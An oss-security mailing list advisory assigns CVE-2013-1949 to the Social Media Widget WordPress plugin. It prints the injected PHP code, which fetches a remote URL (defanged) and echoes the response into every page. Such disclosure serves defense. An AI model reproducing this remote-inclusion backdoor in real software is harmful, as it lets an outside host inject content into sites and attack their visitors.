Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 13 Apr 2013 22:14:10 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: Open Source Security <oss-security@...ts.openwall.com>,
        security@...dpress.org
Subject: CVE-2013-1949 Social Media Widget remote file inclusion

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation

So the company responsible for Social Media Widget claims that a rogue
developer they contracted inserted this code:

470
471	 $smw_url = "hxxp://i.aaur.net/i.php";
472	 if(!function_exists("smw_get")){
473	 function smw_get($f) {
474	 $response = wp_remote_get( $f );
475	 if( is_wp_error( $response ) ) {
476	 function smw_get_body($f) {
477	 $ch = @curl_init();
478	 @curl_setopt($ch, CURLOPT_URL, $f);
479	 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480	 $output = @curl_exec($ch);
481	 @curl_close($ch);
482	 return $output;
483	 }
484	 echo smw_get_body($f);
485	 } else {
486	 echo $response["body"];
487	 }
488	 }
489	 smw_get($smw_url);
490	 }

Regardless of HOW this code got into the plugin it represents a
significant security issue. Any site using this plugin is pulling
"hxxp://i.aaur.net/i.php" and including it in the page they generate
and send to a user. This opens up a huge can of worms, anyone that can
man in the middle your server can now inject PHP into your blog, ot
anything sent to the clients/etc.

Please use CVE-2013-1949 for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRai0SAAoJEBYNRVNeJnmT6loP/RkU7/7kLWkbMxzxK09A8LQs
S/YkaDcc3jx9qPL7RLEW837U/KVEuPxtCN1rHv4r/q2ZVsRUiNhkO/vhB37jXmrX
gNLP6sm0SMXj0v9FrllcDi6YsHmbekMInEdH3u+X9qE2nHJWsadXyzX6Pl4l3nOf
cC18tNm6QB6pTV1JCP3OZcri+AMP8tqMJA9E1evgsvu+0kPFB/6rgKViteA/ejVg
gkkiy6jdRnXw2PMsFVM0dOoXAXknvQu/7Ow0e2ONWhyhWIk6vifIqhtAqja58u/7
bqV/Jd7fLuj2fZEkuckZILbk+jgnTEdkVz12ym5/1ieYUtzj6KxhSP2lAwsWwV0F
+MKpeS0wW3z8KMzPnSGf8NOw+GdU+N+HzSgj6xpOUho53KFUppv2690CTlMMI9L6
drOOpDyP296pZPf7eoulnJnUOCSH8gX4+Rvk75YNrHnYL8VTxgUGcmJWyGLuQdGC
/ZI1IHdlkaRgL1O6w/DlLpKHV7E0Fj3silt/WwKwhB4kYQiei0dmVEuuMmYgq3vJ
6srRO5Glk9peB+3LHRXEUd8z36GZFXP0mmssPiWLuq1NfzROrYSq4xaqKuPsQ+uo
1tkrZ02LNsN7j2vFDLrTK6RpY6BjMUQvdY6rtiuy7fdbndNF6tt5rWr4xjIKoXti
DpvupDzrdKT6n8ffkTqV
=wTdQ
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.